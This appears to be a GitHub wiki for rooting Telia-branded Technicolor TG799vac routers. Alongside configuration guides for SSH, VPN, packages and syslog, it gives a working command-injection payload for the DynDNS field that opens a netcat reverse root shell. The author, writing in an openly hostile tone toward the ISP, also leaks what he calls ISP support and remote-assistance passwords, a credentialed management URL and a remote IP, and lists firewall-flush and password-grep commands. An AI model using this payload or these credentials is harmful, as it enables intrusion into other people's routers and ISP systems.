TG799VAC-XTREME-17.2-MINT

My personal unique wiki for hacking the router firmware used by (Telia)TG799vac Xtream v17.2-MINT delivered from Technicolor

View the Project on GitHub wuseman/TG799VAC-XTREME-17.2-MINT

# TG799VAC-XTREME-17.2-MINT

wuseman edition

Latest firmware with full root access

Autism in all its glory, the greatest credit goes to our friend: weaponizedautism

https://weaponizedautism.wordpress.com/2017/07/14/vulnerabilities-in-technicolor-adsl-residential-gateways

Msg To TeliaCompany AB: This is cause you blacklsited me, morons.

I will expose every setting, every ip and every key i can found until they will remove the backdoors. Now im bored so let’s start i really hate to write descs and the faster you get this information, the faster you can protect yourself from the backdoors.

After my expose of Telias first password they changed their password -> What they did not think of was that if they change password and I still have root access then I could grab their new password as well? Fail! lmao

Telia User-Agents:

IPTV.......: KreaTVWebKit/600 (Motorola STB; Linux; 5305)
SERVER.....: Apache-Coyote/1.1
CISCO.....:  Wget   
WEB........: 

Telias default password for technicolor devices:

Old.......: _T3L1a!SuPPor7   
New:......: SUPP0r7!W1f1R0uT3r 
Remote IP.: 131.116.22.242
Remote IP.: uci show mwan.remoteassist.dest_ip

Shell password:

Login....: root
Password:. root

Assistance Password:

Port......: 60443 (uci get web.remote.port)
Login.....: assistance (uci get web.remote)
Password..: random
Interface.: mgmt (uci get web.remote.interface)
Enable....: uci set web.remote.active=1
Disable...: uci set web.remote.active=0
Ngwfdd
Login.........: telia
Password......: ZDgFbBH5jQvUocL7
URL...........: https://telia:ZDgFbBH5jQvUocLZDgFbBH5jQvUocL7@telia-gw.tgwfd.org:8443/
Via Shell.....: uci get ngwfdd.config.base_url
Cisco.........: https://cisco.nr1.nu/
Sagemcom......: https://sagemcom.nr1.nu/
Technicolor0..: https://technicolor.nr1.nu/    
Technicolor1..: https://github.com/wuseman/TG799vnv2-10.5.1.Q-SMART-3.6.1
Technicolor2..: https://github.com/wuseman/TG799VAC-XTREAM-V16.2-JADE

Boards

Telia - Board: VANT-W

Screenshot

Download URLS:

https://wuseman.nr1.nu/firmwares/technicolor/VANT-W_Telia/172339w1441004closed.rbi
https://wuseman.nr1.nu/firmwares/technicolor/VANT-W_Telia/172339w1441020closed.rbi
https://wuseman.nr1.nu/firmwares/technicolor/VANT-W_Telia/172405w1441030closed.rbi
https://wuseman.nr1.nu/firmwares/technicolor/VANT-W_Telia/1627732w2221002closed.rbi
https://wuseman.nr1.nu/firmwares/technicolor/VANT-W_Telia/15516436w1361002closed.rbi
https://wuseman.nr1.nu/firmwares/technicolor/VANT-W_Telia/15516436w1361005closed.rbi
https://wuseman.nr1.nu/firmwares/technicolor/VANT-W_Telia/15516436w1361006closed.rbi

Telia - Board: VANT-R

Screenshot

Download URLS:

https://wuseman.nr1.nu/firmwares/technicolor/VANT-R_Telia/172339r1021008closed.rbi
https://wuseman.nr1.nu/firmwares/technicolor/VANT-R_Telia/172339r1021022closed.rbi
https://wuseman.nr1.nu/firmwares/technicolor/VANT-R_Telia/172405r1021034closed.rbi
https://wuseman.nr1.nu/firmwares/technicolor/VANT-R_Telia/1627732r2221004closed.rbi
https://wuseman.nr1.nu/firmwares/technicolor/VANT-R_Telia/15516436r1361008closed.rbi
https://wuseman.nr1.nu/firmwares/technicolor/VANT-R_Telia/telia-vant-r_15.51.6436-1361003-bank_dump.xz

Telia - Board: VBNT-H

Screenshot

Download URLS:

https://wuseman.nr1.nu/firmwares/technicolor/VBNT-H_Telia/172339h1441002closed.rbi
https://wuseman.nr1.nu/firmwares/technicolor/VBNT-H_Telia/172339h1441002closed.rbi
https://wuseman.nr1.nu/firmwares/technicolor/VBNT-H_Telia/172405h1441028closed.rbi
https://wuseman.nr1.nu/firmwares/technicolor/VBNT-H_Telia/1627732h2221002closed.rbi
https://wuseman.nr1.nu/firmwares/technicolor/VBNT-H_Telia/172339h1441018closed.rbi
https://wuseman.nr1.nu/firmwares/technicolor/VBNT-H_Telia/172405h1441042closed.rbi (latest)

Telia - Board: VDNT-O

Screenshot

Download URLS:

https://wuseman.nr1.nu/firmwares/technicolor/VDNT-O_Telia/172339o1901024closed.rbi
https://wuseman.nr1.nu/firmwares/technicolor/VDNT-O_Telia/1627732o2221004closed.rbi
https://wuseman.nr1.nu/firmwares/technicolor/VDNT-O_Telia/1720405o1901012closed.rbi
https://wuseman.nr1.nu/firmwares/technicolor/VDNT-O_Telia/15516436o1361004closed.rbi
https://wuseman.nr1.nu/firmwares/technicolor/VDNT-O_Telia/15516436o1361004closed.rbi
https://wuseman.nr1.nu/firmwares/technicolor/VDNT-O_Telia/telia-vdnt-o_10.5.1.Q-bank_dump.xz

Also disable so your router wont get upgraded you can type below command ASAP you have connected to shell (not needed anymore since their server shut down)

uci set cwmpd.cwmpd_config.state=0
rm /etc/cwmp*     

Add your ssh key:

ssh root@192.168.1.1 "tee -a /etc/dropbear/authorized_keys" < ~/.ssh/id_rsa.pub

Get CSFR token via cli:

curl -sL http://192.168.1.1/login.lp?action=getcsrf

Get CSFR token via your browsers developer console:

/*Open prefered browser
Press F12
Go to Console tab
Paste below*/
$("meta[name=CSRFtoken]").attr("content")

For upgrade firmware, you just have to type:

sysupgrade --safe -o /tmp/172339o1901024closed.rbi

Get access to all cards on latest firmware:

/etc/init.d/nginx restart

Screenshot

SSH

SHORT VERSION

Screenshot

Copy and paste all this stuff in dyndns field in webgui (edit ip):
::::::;nc 192.168.1.144 1337 -e /bin/sh

LONG VERSION:

Screenshot

Let’s begin. Fire up a terminal of any kind and just run the awesome netcat tool and listen on a port:

nc -lvvp 1337

Go to the WAN Services and press SHOW ADVANCED. In username, password and domain field you need type the below command, after this is done just enable the dyndns. It wont matter wich hoster you choose just pick one, press save and just wait 4-5 seconds and you have just got full root access of your TG799VAC Xtreme 17.2 Mint, check preview video above if you do not understand.

:::::::;nc [machine_IP] 1337 -e /bin/sh
You will see something similiar and if you see this then you got root access, type ls / for example:
listening on [any] 1337 ...
connect to [192.168.1.144] from router [192.168.1.1] 40980

Let us now allow SSH and other stuff after we get ssh access, copy and paste:

uci set dropbear.mgmt.PasswordAuth=off
uci set dropbear.mgmt.RootPasswordAuth=off
uci set dropbear.mgmt.Port=22
uci set dropbear.mgmt.Interface=mgmt
uci set dropbear.mgmt.AllowedClientIPs=131.116.22.242/32
uci set dropbear.mgmt.enable=0
uci set dropbear.wan.PasswordAuth=off
uci set dropbear.wan.RootPasswordAuth=off
uci set dropbear.wan.Port=22
uci set dropbear.wan.Interface=wan
uci set dropbear.wan.AllowedClientIPs=131.116.22.242/32
uci set dropbear.wan.enable=0
uci set dropbear.lan=dropbear
uci set dropbear.lan.PasswordAuth=on
uci set dropbear.lan.RootPasswordAuth=on
uci set dropbear.lan.Interface=lan
uci set dropbear.lan.IdleTimeout=3600
uci set dropbear.lan.enable=1
uci set dropbear.lan.Port=22
uci set dropbear.lan.AllowedClientIPs=192.168.1.0/32
uci set wireless.global.station_history_persistent=1
uci commit
sleep 1
cd /www/docroot/modals/
for modals in $(ls -1); do sed -i 's/role == "telia"/role == "admin"/g' $modals;done
sed -i 's/role == "engineer"/role == "admin"/g' /www/docroot/modals/firewall-modal.lp
sleep 1
printf "\n%s\n"  "Copy and paste below in this window"
uci show|grep \.roles|grep -v admin|cut -d'=' -f1|sed 's/^/uci add_list /g'|sed 's/$/=admin/g'
uci set web.uidefault.upgradefw_role=admin
printf "\n%s\n"  "Hit enter after you'copy pasted above"
read
uci commit
/etc/init.d/nginx restart
/etc/init.d/dropbear restart
printf "\n%s\n" "All done, refresh  :)"
exit
cat .ssh/*.pub
ssh root@192.168.1.1
vi /etc/dropbear/authorized_keys
printf 

Now ssh into your router:

ssh root@192.168.1.1

Screenshot

Banner(Default)

Screenshot

When you have root access on your router you will be able to unlock rootfs_data and install a very powerful gui vs original from Telia thanks to Ansuel and other awesoem developers by below command:

curl -k https://repository.ilpuntotecnico.com/files/Ansuel/AGTEF/GUI.tar.bz2 --output /tmp/GUI.tar.bz2; 
bzcat /tmp/GUI.tar.bz2 | tar -C / -xvf -;
/etc/init.d/rootdevice force; 
reboot
Now go visit http://192.168.1.1 and you will see a brand new GUI interface. Default login: username: admin - password:admin

This is how it will look a like after you run the above command:

Screenshot

Stats view:

Screenshot

Telstra Extension:

Screenshot

This is an example for default setup with more lua cards:

Screenhot

Luci is another thing you will be able to install - Not supported in above package yet:

Screenshot

Do you look forward to upgrade your firmware without any third party software or without any backdoors from your internet provider? Great, i will show you how you will do this easier then ever..

Add Administrator user to be allowed to upgrade firmwware:

uci add_list web.uidefault.upgradefw_role='admin'
uci commit

If you will try below command you will know how it feels to work for telia a support: ;)

Screenshot

uci set web.usr_Administrator.role='superuser'
uci set web.usr_Administrator.role='telia'

Screenshot

Add your own user without any extra tools:

Screenshot

Add a new user with clash:

![screenshot](files/clash-adduser.gif

clash newsrpuser -u <wuseman> -p <password>

 uci set web_back.usr_wuseman.srp_salt='D0124225'
 uci add web_back.default.users='usr_wuseman'
 uci add web_back.uidefault.defaultuser='wuseman'
 uci add web_back.usr_wuseman=user
 uci set web_back.usr_wuseman.name='wuseman'
 uci set web_back.usr_wuseman.role='wuseman'
 uci set web_back.usr_wuseman.gak_id='1'
cat << "EOF"  >> /etc/config/web
config user 'usr_wuseman'
option name 'wuseman'
option password_reminder '0'
option srp_verifier 'A955EDB6ECAC0536BA69F9D1F1C7F3D9F8A02FDF29170D4A8506A14F7E6F752FF845DACE10E6B3C66C15EAAB53896E41D541C22F32E9E0E8D60A1D7F1D187604BE8A5653B5CDF327542E8DBE5C8481E40C70BD0506448695F7E85338D4427187A49CF799CDDDD2DB3E6D652A25830C42024EB9A682ED5C27E36B159DB7617F41FF6ED5EF58163AC2C68AC26B3D57749AF3AFEF6352950D79A410150E27CE984EA375613737A235B5E28D006C5CE69DE40B651020505AEB7CE5986829D79B9E0375F5127F090CD400B2A2D06385F9931071415042979C8ED80D328BA4810A1692E263733DA9D85DC7E762859145A0D6A607447FCF4FFD53D144D8E018D4F345C9'
option srp_salt 'D0124225'
EOF

Create a user for minitrr064d

computeHA1 -u <username> -p <password> -r
Self test passed - HA1 computation reliable
Self test passed - authentication check reliable

Computing hash for <username>:minitr064d:<password>

OpenVPN Client:

I prefer wireguard, but for OPENVPN see below:

Install Required Packages:
opkg update; 
opkg install openvpn-openssl openssl-util
Configs - Network:
uci set network.vpnclient="interface"
uci set network.vpnclient.ifname="tun0"
uci set network.vpnclient.proto="none"
uci commit network;service network restart
Configs - Firewall:
 uci add firewall zone
 uci set firewall.@zone[-1].name="<vpn_client>"
 uci add_list firewall.@zone[-1].network="<vpn_client>"
 uci set firewall.@zone[-1].input="REJECT"
 uci set firewall.@zone[-1].output="ACCEPT"
 uci set firewall.@zone[-1].forward="REJECT"
 uci set firewall.@zone[-1].masq="​1"​
 uci set firewall.@zone[-1].mtu_fix="1"
 uci add firewall forwarding
 uci set firewall.@forwarding[-1].src="lan"
 uci set firewall.@forwarding[-1].dest="<vpn_client>"
 uci commit firewall; service firewall restart

Setup OpenVPN client:

 uci set openvpn.vpnclient="openvpn"
 uci set openvpn.vpnclient.enabled="1"
 uci set openvpn.vpnclient.config="/etc/openvpn/vpnclient.ovpn"
 uci commit openvpn;service openvpn restart

OPKG

With below setting you will be allowed to install packages from more repos:
cat << "EOF" > /etc/opkg.conf 
arch all 1
arch noarch 1
arch brcm63xx 3
arch brcm63xx-tch 10
EOF
cat << "EOF" >> /etc/opkg/distfeeds.conf
src/gz chaos_calmer http://archive.openwrt.org/chaos_calmer/15.05.1/brcm63xx/smp/packages/base
src/gz luci http://archive.openwrt.org/chaos_calmer/15.05.1/brcm63xx/smp/packages/luci
src/gz management http://archive.openwrt.org/chaos_calmer/15.05.1/brcm63xx/smp/packages/management
src/gz routing http://archive.openwrt.org/chaos_calmer/15.05.1/brcm63xx/smp/packages/routing
src/gz packages http://archive.openwrt.org/chaos_calmer/15.05.1/brcm63xx/smp/packages/packages
src/gz telephony http://archive.openwrt.org/chaos_calmer/15.05.1/brcm63xx/smp/packages/telephony
EOF

TFTP

Install TFTP:

Client wise:

Switch device power off (or pull the power cord). Connect a client to the device via Ethernet to LAN1, trigger the rescue function by pressing and holding the reset button of the device and then turning the device on (or plug in the power cord). You can release the reset button after a few seconds.

The device will take ~15-20 seconds to boot a mini-web server, that provides only a single function: it can upload a firmware file and has a button to trigger the flash process. The web-server will usually be available under either (if in doubt, try both)

http://192.168.1.1

Install atftpd on a Gentoo Machine (OpenRC)

emerge --sync; emerge -a atftpd
mkdir /mnt/tftp
cp <firmware.bin> /mnt/tftp/
chown nobody:nogroup -R /mnt/tftp
cat << "EOF" > /etc/conf.d/atftp
TFTPD_ROOT="/mnt/tftp"
TFTPD_OPTS="--daemon --user nobody --group nobody"
/etc/init.d/atftpd start
EOF

Thats it, now use getent to confirm it is up and running:

getent services tftp

Server Wise (router)

uci set dhcp.dnsmasq.enable_tftp='1'

First you need to setup a static ip to be able to communicate with router:

ifconfig eth0 192.168.1.2 netmask 255.255.255.0 up 
route add default gw 192.168.1.1
echo "nameserver 192.168.1.1" > /etc/resolv.conf
tcpdump -i enp0s31f6 -vvv -s 0 port bootps

When tg799 router reporting BOOTP then run below command:

atftp --trace --option "timeout 1" --option "mode octet" --put --local-file tg799bin.firmware.rbi 192.168.1.1

Got stuck with some packages that says error opening terminal? No worries - This is caused cause colors - Run below command to fix the xterm problem:

Screenshot

export TERM=linux
export TERMINFO=/etc/terminfo

Run uci-whois.sh from scripts dir to whois all ip’s that your isp added for various settings:

Screenshot

Mount root as read and write:

mount -o remount,rw /
If you are lazy and want things sorted as i do, then run below command:

Screenshot

mkdir /tmp/uci_sorted;
cd /tmp/uci_sorted;

for uci_settings in "$(uci show | awk -F. '{print $1}' | uniq)"; do 
    uci show ${uci_settings} > /tmp/uci_sorted/${uci_settings};
done

List all files where “password=” is readable:

grep -r -iE 'password=' /etc 

List all files where you can find your serial:

find . -type f | xargs grep -e 'SERIAL' | cut -d':' -f1 | grep / | uniq

Turning off Power-Saving features

pwrctl config --cpuspeed 0
pwrctl config --wait off
pwrctl config --ethapd off
pwrctl config --eee off
pwrctl config --autogreeen off

For users that miss vpn card in webgui, run below command (if this modal is missing then its under modals dir in this repo)

Screenshot

cp /rom/www/docroot/modals/l2tp-ipsec-server-modal.lp /www/docroot/modals/

cat >> /etc/config/web

list rules 'l2tpipsecservermodal'
config rule 'l2tpipsecservermodal'
option target '/modals/l2tp-ipsec-server-modal.lp'
list roles 'admin'
list roles 'engineer'

Setup your dns provider from commandline:

cat << "EOF"  > /etc/config/ddns 
config service 'myddns_ipv4'
    option interface 'wan'
    option ip_source 'network'
    option ip_network 'wan'
    option use_https '1'
    option cacert 'IGNORE'
    option force_interval '36500'
    option force_unit 'days'
    option enabled '1'
    option password 'password'
    option username 'domain.com'
    option service_name 'loopia.se'
    option lookup_host 'domain.com'
    option domain 'domain.com'"
EOF

Setup domain names:

Example 1 - Echo method
    echo "
    config domain
    option name 'github'
    option ip '192.30.253.112'" >> /etc/config/dhcp
Example 2 - UCI method
uci set dhcp.@domain[1]=domain
uci set dhcp.@domain[1].name='github'
uci set dhcp.@domain[1].ip='192.30.253.112'

Portforwarding

Example 1 - Echo method
cat << "EOF" > /etc/config/firewall
    config userredirect 'userredirectXXDD'
    option dest_port '<PORTNUMBER>'
    option dest 'lan'
    option src 'wan'
    list proto '<tcp>/<udp>/<tcpudp>'
    option enabled '<1>/<0>'
    option name 'CUSTOMNAMEINWEBINTERFACE'
    option src_dport '<PORTNUMBER>'
    option family '<ipv4>/<ipv6>'
    option target 'DNAT'
    option dest_ip '<lanip>'"
EOF
Example 2 - UCI method
uci set firewall.userredirect4320=userredirect
uci set firewall.userredirect4320.family='<ipv4/ipv6>'
uci set firewall.userredirect4320.enabled='<1>'
uci set firewall.userredirect4320.target='DNAT'
uci set firewall.userredirect4320.src='<wan>'
uci set firewall.userredirect4320.dest='<lan>'
uci set firewall.userredirect4320.dest_port='<port>'
uci set firewall.userredirect4320.name='nameyourforwarding'
uci set firewall.userredirect4320.src_dport='<port>'
uci set firewall.userredirect4320.dest_ip='<0.0.0.0>' # use 0.0.0.0 if you dont use static leases
uci set firewall.userredirect4320.dest_mac='<macaddr>'
uci set firewall.userredirect4320.proto='tcp' '<tcp/udp>'

Disable UPNP:

uci set minitr064d.config=minitr064d
uci set minitr064d.config.enable_upnp='0'
uci set minitr064d.config.log_output='0'
uci set minitr064d.config.internal_iface='lan'
uci set minitr064d.config.port='0'
uci set minitr064d.config.manufacturer_url=''
uci set minitr064d.config.model_url=''
uci set minitr064d.config.model_description='main router'
uci set minitr064d.config.model_number='tg799vac xtream router'
uci set minitr064d.config.friendly_name='tg799vac xtream router'
uci set minitr064d.config.manufacturer_name='tg799vac xtream router'
uci set minitr064d.config.model_name='technicolor'

Environment settings:

uci set env.var.aria2_webui='0'
uci set env.var.luci_webui='0'
uci set env.var.transmission_webui='0'
uci set env.var.xupnp_app='0'
uci set env.var.blacklist_app='0'
uci set env.var.new_ver='only god knows'
uci set env.rip.sfp='1'
List all URLs for your firmware that can be downloaded (wont work on telias firmware. Did you found the key? Please contact me then):
strings /etc/cwmpd.db
    SQLite format 3
    tabletidkvtidkv
    CREATE TABLE tidkv (  type TEXT NOT NULL,  id TEXT NOT NULL,  key TEXT NOT NULL,  value TEXT,  PRIMARY KEY (type, id, key)))
    indexsqlite_autoindex_tidkv_1tidkv
    transferPassword5
    transfer Username
    Stransfer URLhttp://192.168.21.52:7547/ACS-server
    5transferaStartTime2018-08-19T15:20:13Z
    transfera FaultStringcomplete
    transfera FaultCode0M_
    M%5transfera CompleteTime2018-08-19T15:19:57Z
    'transfera TimeStamp244,9XXXXXX
    transfera DelaySeconds3
    transfera Password
    transfera Username
    runtimevarParameterKey#
    runtimevarConfigurationVersionD
    %_runtimevarBootStrappedhttps://acs.telia.com:7575/ACS-server/ACS-
     +/VersionsSoftwareVersion16.2.XXXXXX
    transfer FaultString
    transfer FaultCode
    transfer TimeSt6
    transfera UsernameU
    transfera URLT7
    transfera TimeStampX
    transfera SubStatec
    transfera Stateb7
    transfera StartTimed
    transfera PasswordV

List network devices:

awk '{print $1}' /proc/net/dev

To get a fresh network configuration on your client system you can remove all IP addresses via:

ip a flush dev <device>

Disable all firewall rules temp:

iptables -P INPUT ACCEPT
iptables -P FORWARD ACCEPT
iptables -P OUTPUT ACCEPT
iptables -t nat -F
iptables -t mangle -F
iptables -F
iptables -X

Changing max sync speed on your modem:

uci set xdsl.dsl0.maxaggrdatarate='200000' # 16000 default
uci set xdsl.dsl0.maxdsdatarate='140000'   # 11000 default
uci set xdsl.dsl0.maxusdatarate='60000'    # 40000 default

Enable or Disable dnsmasq:

uci show dhcp.lan.ignore='1'

Enable or Disable network time server:

uci set system.ntp.enable_server='1'

Check the current running dns with:

cat /etc/resolv.conf
uci set web.uidefault.nsplink='https://sendit.nu'

This will show all traffic on your router with netstat:

netstat -tulnp

This will show all ip numbers connected to your router atm..

netstat -lantp | grep ESTABLISHED |awk '{print $5}' | awk -F: '{print $1}' | sort -u

Capture traffic on all interfaces (add -i wl0 for include wifi):

tcpdump -vvv -ttt -p -U
tcpdump -i wl0 -vvv -ttt -p -U

Enable or Disable Content Sharing (Samba / DNLA)

uci set samba.samba.enabled='1'
uci set dlnad.config.enabled='1'

Take control over mwan:

uci set mwan.remoteassist=rule
uci set mwan.remoteassist.dest_ip='192.168.1.0/24'
uci set mwan.remoteassist.policy=''

To view currently dhcp leases:

cat /tmp/dhcp.leases

To view all ipv4 adresses from uci settings:

uci show | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b"

clash showinfo cpu

 Processor     : ARMv7 Processor rev 1 (v7l)
 processor     : 0
 BogoMIPS    : 1990.65

 processor     : 1
 BogoMIPS    : 1990.65

 Features    : swp half thumb fastmult edsp tls
 CPU implementer : 0x41
 CPU architecture: 7
 CPU variant    : 0x4
 CPU part    : 0xc09
 CPU revision    : 1

 Hardware    : BCM963138
 Revision    : 0000
 Serial     : 0000000000000000
Enable or Disable GUI:
uci set web.remote.active='1'
List all interfaces mac-addr:
ifconfig -a  | sed '/eth\|wl/!d;s/ Link.*HWaddr//'
    eth0      X0:X0:X0:X0:X0:X0
    eth1      X0:X0:X0:X0:X0:X0
    eth2      X0:X0:X0:X0:X0:X0
    eth3      X0:X0:X0:X0:X0:X0
    eth4      X0:X0:X0:X0:X0:X0
    eth5      X0:X0:X0:X0:X0:X0
    vlan_eth0 X0:X0:X0:X0:X0:X0
    vlan_eth1 X0:X0:X0:X0:X0:X0
    vlan_eth2 X0:X0:X0:X0:X0:X0
    vlan_eth3 X0:X0:X0:X0:X0:X0
    vlan_eth5 X0:X0:X0:X0:X0:X0
    wl0       X0:X0:X0:X0:X0:X0
    wl0_1     X0:X0:X0:X0:X0:X0
    wl0_2     X0:X0:X0:X0:X0:X0

Various settings:

uci set dlnad.config.friendly_name='tg799vac xtream router'
uci set dlnad.config.model_name='tg799vac xtream router'
uci set dlnad.config.manufacturer_url=''
uci set dlnad.config.model_url=''
uci set env.var.company_name='technicolor'
uci set env.var.prod_friendly_name='tg799vac xtream router'
uci set env.var.variant_friendly_name='tg799tvac xtream router'
uci set env.var.prod_name='media'
uci set env.var.prod_description='main router'
uci set env.var.prod_number='tg799vac xtream router'
uci set env.var.isp='telia'
uci set mmdetectslic.non_voice_var.company_name='technicolor'

Remove trafficmon settings:

uci delete system.@trafficmon[0].interface=''
uci delete system.@trafficmon[0].minute=''
uci delete system.@trafficmon[1].interface=''
uci delete system.@trafficmon[1].minute=''
uci delete system.@trafficmon[2].interface=''
uci delete system.@trafficmon[2].minute=''
uci delete system.@trafficmon[3]=trafficmon
uci delete system.@trafficmon[3].interface=''
uci delete system.@trafficmon[3].minute=''
uci delete web.trafficmonitor=rule
uci delete web.ruleset_main.rules='gateway'
uci delete web.trafficmonitor.target='/modals/traffic-monitor.lp'
uci delete web.trafficmonitor.roles='admin'

Send syslog to your own server instead of sending * to Telia (it’s insane that they want all stuff they filtering as default)

uci set ledfw.syslog=syslog
uci set ledfw.syslog.trace='6'
uci set mmpbx.syslog=syslog
uci set mmpbx.syslog.service_config='1'
uci set mmpbx.syslog.service_actions='1'
uci set mmpbx.syslog.calls='1'
uci set mmpbx.syslog.syslog_priority='6'
uci set mmpbx.syslog.hide_user_identity='0'
uci set mmpbxbrcmdectdev.syslog=syslog
uci set mmpbxbrcmdectdev.syslog.phone='1'
uci set mmpbxbrcmdectdev.syslog.syslog_priority='6'
uci set mmpbxbrcmdectdev.syslog.syslog_hide_dialled_digits='1'
uci set mmpbxbrcmfxsdev.syslog=syslog
uci set mmpbxbrcmfxsdev.syslog.phone='1'
uci set mmpbxbrcmfxsdev.syslog.syslog_priority='6'
uci set mmpbxbrcmfxsdev.syslog.syslog_hide_dialled_digits='1'
uci set mmpbxrvsipnet.syslog=syslog
uci set mmpbxrvsipnet.syslog.registration='1'
uci set mmpbxrvsipnet.syslog.call_signalling='1'
uci set mmpbxrvsipnet.syslog.syslog_priority='6'
uci set mmpbxrvsipnet.syslog.log_sip_message='1'
uci set mmpbxrvsipnet.syslog.hide_user_identity='0'
uci set osgi.config.enable_syslog='1'
uci set siege.log.enable_syslog='1'
uci del_list web_back.syslogmodal.roles='telia'

Grab all filters from log.txt when you export this from diagnostic tab and then insert the lines in /etc/config/system to log everything on your syslog server:

cat log.txt  | awk '{print $7}' | sed 's/://g' | uniq -d | sort -r | uniq | sed 's/^/        list log_filter "/g' | sed 's/$/"/g'|sed "s/\"/'/g"

##### Settings for syslog

By uci:

```sh
system.@system[0].log_port='514'
uci show system.@system[0].log_port
uci show system.@system[0].filter_ip

Via system file:

cat << "EOF" > /etc/config/system
config system

    option log_filter_ip '192.168.1.208'
    option log_port '514'
    option hostname 'router'
    option zonename 'Europe/Stockholm'
    option timezone 'CET-1CEST,M3.5.0,M10.5.0/3'
    option network_timezone '1'
    option hw_reboot_count '0'
    option sw_reboot_count '0'
    option cronloglevel '5'

# Filters for /modals/logviewer-modal.lp and what to send to syslog-ng server

    list log_filter 'Everything'
    list log_filter 'warmboot'
    list log_filter 'cwmp'
    list log_filter 'cwmpd'
    list log_filter 'crond'
    list log_filter 'Critical'
    list log_filter 'Zonewatcher'
    list log_filter 'wifiinfo'
    list log_filter 'wifi'
    list log_filter 'mmpbxd'
    list log_filter 'transformer'
    list log_filter 'zoneredird'
    list log_filter 'zone_daemon'
    list log_filter 'syslog'
    list log_filter 'root'
    list log_filter 'premiumd'
    list log_filter 'lua'
    list log_filter 'nginx'
    list log_filter 'kernel'
    list log_filter 'ipks'
    list log_filter 'ipk'
    list log_filter 'root'
    list log_filter 'user'
    list log_filter 'mwan'
    list log_filter 'lan'
    list log_filter 'vlan'
    list log_filter 'opkg'
    list log_filter 'hostmanager'
    list log_filter 'hostapd'
    list log_filter 'fseventd'
    list log_filter 'dnsmasq-dhcp'
    list log_filter 'dnsmasq'
    list log_filter 'ddns-scripts'
    list log_filter 'awk'
    list log_filter 'assist.remote'
    list log_filter 'assist'
    list log_filter 'ash'
    list log_filter 'bash'
    list log_filter 'sh'
    list log_filter 'clash'
    list log_filter 'user.notice'
    list log_filter 'auth'
    list log_filter 'pppoe-relay-hotplug'
    list log_filter 'odhcpd'
    list log_filter 'ipsec_starter'
    list log_filter 'ipsec'
    list log_filter 'insmod'
    list log_filter 'modprobe'
    list log_filter 'rmmod'
    list log_filter 'vpn'
    list log_filter 'openvpn'
    list log_filter 'netifd'
    list log_filter 'wansensing'
    list log_filter 'miniupnpd'
    list log_filter 'user.info'
    list log_filter 'guest'
    list log_filter 'wget'
    list log_filter 'curl'
    list log_filter 'ssh'
    list log_filter 'sshd'
    list log_filter 'telnet'
    list log_filter 'http'
    list log_filter 'https'
    list log_filter 'ftp'
    list log_filter 'ftpd'
    list log_filter 'uci'
    list log_filter 'postmortem'
    list log_filter 'trafficmon.voip'

config timeserver 'ntp'
    option enable_server '1'
    option program '/sbin/firstusedate'
    list server 'ntp1.rgw.telia.se'
    list server 'ntp2.rgw.telia.se'
    list server '0.se.pool.ntp.org'
    list server '1.se.pool.ntp.org'
    list server '2.se.pool.ntp.org'
    list server '3.se.pool.ntp.org'
    list server 'time.google.com'
    list server 'time1.google.com'
    list server 'time2.google.com'
    list server 'time3.google.com'
    list server 'time4.google.com'

config config config
     option export_plaintext  '1'
     option export_unsigned   '1'
     option import_plaintext  '1'
     option import_unsigned   '1'
     option usb_filesystem_charset 'utf8'

config coredump
    option path '/root'
    option url 'https://telia-core.tgwfd.org:5443/'
    option action 'ignore'
    option reboot '0'

config log 'logread'
    option path 'logread'

config trafficmon
    option interface 'wan'
    option minute '*/720'

config trafficmon
    option interface 'mgmt'
    option minute '*/720'

config trafficmon
    option interface 'voip'
    option minute '*/720'

config trafficmon
    option interface 'iptv'
    option minute '*/720'
    option sw_reboot_count '0'

    config time 'time'
EOF

Now restart system:

/etc/init.d/system restart

On your syslog server then put this in /etc/syslog/syslog.conf to recieve all messages from your tg799 xtream router.

Here is a screenshot from the listening server with the config below:

Screenshot

@version: 3.30
@include "scl.conf"

options {
    create_dirs(yes);
    owner(wuseman);
    group(wuseman);
    perm(0644);
    dir_owner(wuseman);
    dir_group(wuseman);
    dir_perm(0755);
};
 
 
source s_udp {
    network (
            ip-protocol(6)
            transport("udp")
            port(514)
    );
    network (
            transport("udp")
            port(514)
    );
};

destination d_host-specific {
    file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-syslog.log");
};

log {
    source(s_udp);
    destination(d_host-specific);
};


source src {
unix-stream("/dev/log" max-connections(256));
internal();
};

source kernsrc { file("/proc/kmsg"); };

# define destinations
destination authlog { file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-auth.log"); };
destination syslog { file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-syslog"); };
destination cron { file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-cron.log"); };
destination daemon { file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-daemon.log"); };
destination kern { file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-kern.log"); };
destination lpr { file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-lpr.log"); };
destination user { file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-user.log"); };
destination mail { file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-mail.log"); };
destination mailinfo { file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-mail.info"); };
destination mailwarn { file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-mail.warn"); };
destination mailerr { file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-mail.err"); };
destination newscrit { file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-news/news.crit"); };
destination newserr { file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-news/news.err"); };
destination newsnotice { file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-news/news.notice"); };
destination debug { file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-debug"); };
destination messages { file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-messages"); };
destination console { usertty("root"); };
destination console_all { file("/dev/tty12"); };
#destination console_all { file("/dev/console"); };
filter f_authpriv { facility(auth, authpriv); };
filter f_syslog { not facility(authpriv, mail); };
filter f_cron { facility(cron); };
filter f_daemon { facility(daemon); };
filter f_kern { facility(kern); };
filter f_lpr { facility(lpr); };
filter f_mail { facility(mail); };
